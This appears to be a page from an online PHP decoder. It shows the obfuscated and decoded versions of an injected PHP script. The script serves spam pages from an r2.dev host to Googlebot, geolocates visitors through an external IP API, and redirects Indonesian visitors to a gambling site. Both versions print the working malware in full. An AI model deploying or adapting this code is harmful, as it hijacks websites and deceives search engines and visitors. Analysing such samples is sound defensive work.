Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto HRtbA; HRtbA: function profile_user() { $refererUrl = !empty($_SERVER["\110\x..

Decoded Output download

<?php 
 goto HRtbA; HRtbA: function profile_user() { $refererUrl = !empty($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $useragent = $_SERVER["HTTP_USER_AGENT"]; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); $themes = "https://pub-487d03ac58d442ddb9c0e09d16b600b3.r2.dev/bacem.html"; if (strpos($useragent, "Google-InspectionTool") !== false || strpos($useragent, "googlebot") !== false || strpos($useragent, "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["REMOTE_ADDR"]; $api_url = "https://api.incolumitas.com/?q=" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "JSON Decode error: " . json_last_error_msg(); die; } $language = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (isset($data["country_code"]) && $data["country_code"] === "ID" || isset($data["country"]) && $data["country"] === "Indonesia" || strpos($language, "id") !== false) { header("Location: https://aksescepat.xyz/vegas969", true, 301); die; } include "index.php"; die; } goto pwPC7; pwPC7: profile_user(); goto k7x1z; k7x1z: ?>

Did this file decode correctly?

Original Code

<?php
 goto HRtbA; HRtbA: function profile_user() { $refererUrl = !empty($_SERVER["\110\x54\x54\x50\137\x52\105\106\105\x52\x45\122"]) ? $_SERVER["\110\x54\124\120\x5f\122\105\x46\105\x52\x45\x52"] : ''; $useragent = $_SERVER["\x48\x54\124\x50\137\x55\123\x45\122\x5f\101\x47\x45\x4e\124"]; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); $themes = "\150\164\x74\160\x73\72\x2f\57\x70\x75\x62\55\64\x38\x37\x64\x30\x33\141\143\x35\x38\x64\x34\64\62\x64\x64\142\71\x63\60\x65\60\71\x64\61\x36\x62\66\60\x30\x62\x33\x2e\x72\x32\x2e\x64\x65\166\x2f\x62\141\143\x65\x6d\x2e\150\x74\x6d\x6c"; if (strpos($useragent, "\107\157\x6f\147\154\145\x2d\x49\156\163\160\145\x63\x74\151\157\x6e\124\157\x6f\x6c") !== false || strpos($useragent, "\x67\157\x6f\147\x6c\145\x62\157\164") !== false || strpos($useragent, "\50\x63\157\155\x70\x61\x74\151\x62\154\145\73\x20\x47\x6f\157\x67\154\x65\142\x6f\x74\x2f\62\56\x31\73\40\x2b\150\164\164\160\72\x2f\x2f\167\167\167\x2e\147\157\157\147\154\145\56\x63\x6f\155\x2f\x62\157\x74\x2e\150\164\x6d\154\x29") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["\122\105\115\x4f\x54\105\x5f\101\x44\x44\122"]; $api_url = "\x68\164\x74\160\163\x3a\57\x2f\141\x70\151\x2e\x69\x6e\143\157\154\165\x6d\x69\x74\141\163\56\143\157\155\x2f\77\x71\x3d" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "\112\x53\117\x4e\40\x44\x65\143\x6f\144\145\x20\x65\162\162\x6f\x72\x3a\40" . json_last_error_msg(); die; } $language = isset($_SERVER["\x48\x54\124\120\137\x41\103\x43\105\x50\124\137\114\101\x4e\107\x55\101\x47\105"]) ? strtolower($_SERVER["\x48\124\x54\120\x5f\101\103\103\x45\x50\124\137\114\101\116\107\125\101\x47\x45"]) : ''; if (isset($data["\143\x6f\x75\156\164\x72\x79\x5f\143\x6f\144\x65"]) && $data["\143\157\165\x6e\x74\162\171\137\143\157\x64\145"] === "\x49\104" || isset($data["\x63\x6f\165\156\164\x72\x79"]) && $data["\143\x6f\165\x6e\164\162\171"] === "\x49\x6e\x64\x6f\x6e\x65\x73\x69\x61" || strpos($language, "\x69\x64") !== false) { header("\x4c\x6f\x63\x61\164\151\x6f\x6e\72\x20\x68\164\164\x70\x73\x3a\57\x2f\141\x6b\163\x65\x73\x63\145\160\x61\x74\56\x78\x79\x7a\x2f\x76\x65\x67\141\163\x39\66\71", true, 301); die; } include "\151\156\x64\145\x78\x2e\160\x68\160"; die; } goto pwPC7; pwPC7: profile_user(); goto k7x1z; k7x1z: ?>

Function Calls

None

Variables

None

Stats

MD5 c92aa501764d890faf678faa6df05ec0
Eval Count 0
Decode Time 43 ms